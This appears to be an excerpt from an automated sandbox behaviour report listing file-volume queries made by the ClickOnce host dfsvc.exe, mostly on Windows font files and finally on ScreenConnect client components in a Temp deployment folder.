Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
